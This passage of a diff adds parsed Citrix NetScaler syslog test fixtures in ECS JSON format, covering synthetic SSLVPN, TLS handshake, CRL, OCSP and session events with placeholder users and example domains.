"2023-04-01T15:00:00.000Z", + "groups": "Management,Executives", + "message": "User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"", + "nat": { + "ip": "10.0.0.57" + }, + "source": { + "ip": "192.168.1.58", + "port": 3389 + }, + "start_time": "2023-04-01T14:00:00.000Z", + "total_bytes_received": 600000, + "total_bytes_send": 1200000, + "user": "DianaPrince", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.57" + }, + "destination": { + "bytes": 600000, + "ip": "1.128.0.0", + "port": 22 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T15:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN UDPFLOWSTAT 4471 0 : User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"", + "severity": 0, + "start": "2023-04-01T14:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Management,Executives" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.58", + "1.128.0.0", + "10.0.0.57", + "192.168.1.57" + ], + "user": [ + "DianaPrince" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "bytes": 1200000, + "ip": "192.168.1.58", + "nat": { + "ip": "10.0.0.57" + }, + "port": 3389 + }, + "tags": [ + 
"preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "DianaPrince" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN NONHTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"SecurityPolicy\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "- Denied_by_policy \"SecurityPolicy\"" + }, + "facility": "local0", + "host": "ns1", + "name": "NONHTTP_RESOURCEACCESS_DENIED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "- Denied_by_policy \"SecurityPolicy\"", + "policy_violation": "SecurityPolicy" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN NONHTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"SecurityPolicy\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"UnauthorizedAccessAttempt\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "- Denied_by_policy \"UnauthorizedAccessAttempt\"" + }, + "facility": "local0", + "host": "ns1", + "name": "HTTP_RESOURCEACCESS_DENIED", + "priority": "info" 
+ }, + "citrix_adc": { + "log": { + "message": "- Denied_by_policy \"UnauthorizedAccessAttempt\"", + "policy_violation": "UnauthorizedAccessAttempt" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"UnauthorizedAccessAttempt\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LICLMT_REACHED 4471 0 : Vserver 1.128.0.0:443 - License_limit 500", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Vserver 1.128.0.0:443 - License_limit 500" + }, + "facility": "local0", + "host": "ns1", + "name": "LICLMT_REACHED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "license_limit": 500, + "message": "Vserver 1.128.0.0:443 - License_limit 500", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], 
+ "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LICLMT_REACHED 4471 0 : Vserver 1.128.0.0:443 - License_limit 500", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_CHECK 4471 0 : Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -" + }, + "facility": "local0", + "host": "ns1", + "name": "CLISEC_CHECK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.100", + "client_security_expression": "geoLocationBlocked", + "message": "Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.100" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_CHECK 4471 0 : Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "192.168.1.100" 
+ ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_EXP_EVAL 4471 0 : User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine" + }, + "facility": "local0", + "host": "ns1", + "name": "CLISEC_EXP_EVAL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.101", + "client_security_check_status": "200", + "message": "User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine", + "user": "ClarkKent", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.101" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_EXP_EVAL 4471 0 : User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "192.168.1.101" + ], + "user": [ + "ClarkKent" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "ClarkKent" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : 
SSLVPN STA_VALIDATE_RESP 4471 0 : Xdatalen 1024 - Xdata PayloadWithSensitiveInformation", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Xdatalen 1024 - Xdata PayloadWithSensitiveInformation" + }, + "facility": "local0", + "host": "ns1", + "name": "STA_VALIDATE_RESP", + "priority": "info" + }, + "citrix_adc": { + "log": { + "data": "PayloadWithSensitiveInformation", + "data_length": 1024, + "message": "Xdatalen 1024 - Xdata PayloadWithSensitiveInformation" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN STA_VALIDATE_RESP 4471 0 : Xdatalen 1024 - Xdata PayloadWithSensitiveInformation", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_FAILURE 4471 0 : Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_FAILURE", + "priority": "info" + }, + 
"citrix_adc": { + "log": { + "cipher_suite": "ECDHE-RSA-AES256-GCM-SHA384", + "message": "Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf", + "protocol_version": "TLS1.2", + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "session": "0x12a7bf", + "spcb_id": "128" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_FAILURE 4471 0 : Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 4471 0 : Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - 
ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "TLS_AES_128_GCM_SHA256", + "message": "Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0", + "protocol_version": "TLS1.3", + "server": { + "ip": "1.128.0.0", + "port": 843 + }, + "session": "0x12a7c0", + "spcb_id": "256" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUCCESS 4471 0 : Backend SPCBId 256 - ServerIP 1.128.0.0 - ServerPort 843 - ProtocolVersion TLS1.3 - CipherSuite \"TLS_AES_128_GCM_SHA256\" - Session 0x12a7c0", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 843 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "cipher": "TLS_AES_128_GCM_SHA256" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CERT_EXPIRY_IMMINENT 4471 0 : Certificate Key Pair RSA2048 - Days To Expire 365", + "device_event_class_id": "SSLLOG", + "extended": { + 
"message": "Certificate Key Pair RSA2048 - Days To Expire 365" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_CERT_EXPIRY_IMMINENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "certificate_key_pair": "RSA2048", + "days_to_expire": 365, + "message": "Certificate Key Pair RSA2048 - Days To Expire 365" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CERT_EXPIRY_IMMINENT 4471 0 : Certificate Key Pair RSA2048 - Days To Expire 365", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_ISSUERNAME 4471 0 : SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_ISSUERNAME", + "priority": "info" + }, + "citrix_adc": { + "log": { + "issuer_name": "CN=Example CA, O=Example Organization, C=US", + "message": "SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"", + "spcb_id": "512" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + 
"country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_ISSUERNAME 4471 0 : SPCBId 512 - Issuer Name \"CN=Example CA, O=Example Organization, C=US\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "server": { + "issuer": "CN=Example CA, O=Example Organization, C=US" + } + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUBJECTNAME 4471 0 : SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_SUBJECTNAME", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"", + "spcb_id": "1024", + "subject_name": "CN=www.example.com, O=Example Company, C=US" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": 
"4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_SUBJECTNAME 4471 0 : SPCBId 1024 - Subject Name \"CN=www.example.com, O=Example Company, C=US\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "tls": { + "server": { + "subject": "CN=www.example.com, O=Example Company, C=US" + } + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_SUCCESS 4471 0 : crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_CRL_UPDATE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "crl_name": "ExampleCRL", + "ldap_scope": "SUB", + "message": "crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB", + "method": "LDAP", + "server": { + "ip": "1.128.0.0", + "port": 389 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_SUCCESS 4471 0 : crl_name ExampleCRL - server_ip 1.128.0.0 - server_port 389 - method LDAP - ldapscope SUB", + 
"severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + "request": { + "method": "LDAP" + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 389 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_FAILURE 4471 0 : crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_CRL_UPDATE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "crl_name": "AnotherCRL", + "ldap_scope": "BASE", + "message": "crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE", + "method": "LDAP", + "server": { + "ip": "1.128.0.0", + "port": 636 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_CRL_UPDATE_FAILURE 4471 0 : crl_name AnotherCRL - server_ip 1.128.0.0 - server_port 636 - method LDAP - ldapscope BASE", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "http": { + 
"request": { + "method": "LDAP" + } + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "ip": "1.128.0.0", + "port": 636 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_SUCCESS 4471 0 : Domainname example.com Ipaddress 1.128.0.0", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Domainname example.com Ipaddress 1.128.0.0" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_OCSPURL_RESOLVE_SUCCESS", + "priority": "info" + }, + "citrix_adc": { + "log": { + "domain_name": "example.com", + "ip_address": "1.128.0.0", + "message": "Domainname example.com Ipaddress 1.128.0.0" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_SUCCESS 4471 0 : Domainname example.com Ipaddress 1.128.0.0", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144", + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.com" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": 
{ + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_FAILURE 4471 0 : Domainname example.net Ipaddress 1.128.0.0", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Domainname example.net Ipaddress 1.128.0.0" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_OCSPURL_RESOLVE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "domain_name": "example.net", + "ip_address": "1.128.0.0", + "message": "Domainname example.net Ipaddress 1.128.0.0" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_OCSPURL_RESOLVE_FAILURE 4471 0 : Domainname example.net Ipaddress 1.128.0.0", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144", + "1.128.0.0" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.net" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SUBSCRIBER SESSION_EVENT 4471 0 : Session 12345", + "device_event_class_id": "SUBSCRIBER", + "extended": { + "message": "Session 12345" + }, + "facility": "local0", + "host": "ns1", + "name": "SESSION_EVENT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "session": "12345" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + 
